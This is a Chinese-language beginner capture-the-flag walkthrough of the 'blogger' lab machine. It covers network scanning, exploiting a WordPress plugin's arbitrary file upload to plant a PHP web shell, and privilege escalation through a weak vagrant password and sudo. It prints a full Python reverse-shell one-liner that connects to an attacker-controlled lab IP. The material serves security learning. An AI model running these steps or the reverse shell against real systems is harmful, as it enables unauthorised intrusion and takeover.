blogger靶机

2022-04-12 16:50:12 浏览数 (2)

难度:初学者

思路:扫目录→发现目录遍历→发现一个wordpress搭建的网站→发现一个插件漏洞任意文件上传→上传shell→python反弹shell→获取vagrant用户密码→登录用户发现可以执行所有命令→sudo su提权→成功获取flag

首先扫描网络获取靶机ip

代码语言:javascript复制
arp-scan -l

接着nmap扫描这个ip,看到开启80、22端口

代码语言:javascript复制
nmap -sV 192.168.101.50

访问80端口,看到使用wordpress搭建

使用wpscan扫描一下无结果

使用dirb扫一下目录,得到了4个目录

代码语言:javascript复制
dirb http://192.168.101.50 

访问一下,发现存在目录遍历

查找到这个地址,

用wpscan扫描一下,没有发现什么有价值的东西

随便点开一个看看,f12审查元素,发现一个wordpress插件

查找一下有没有漏洞,发现存在任意文件上传

上传图片马,burp抓包改后缀为php

上传成功,返回了上传路径

蚁剑成功连接

发现不是root权限

接下来进行提权,再次上传可以执行系统命令的文件,注意改成get方式提交,post也可以不过需要hackbar工具,这里为了方便使用get

使用python反弹shell

代码语言:javascript复制
a=python3 -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.101.52",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

成功反弹shell

获取一个交互式shell

代码语言:javascript复制
python3 -c 'import pty; pty.spawn("/bin/bash")'

来到/home目录发现三个用户目录

查看james发现user.flag

无法查看其中信息,估计是没有权限

查看/etc/passwd发现了这三个用户(爆破获取vagrant密码是vagrant)其实是看到网上教程得到的,其实这里不会

切换到vagrant用户,发现可以执行所用命令

直接sudo su提权,成功得到user.txt

切换到root目录下成功获取root.txt

base64解码

0 人点赞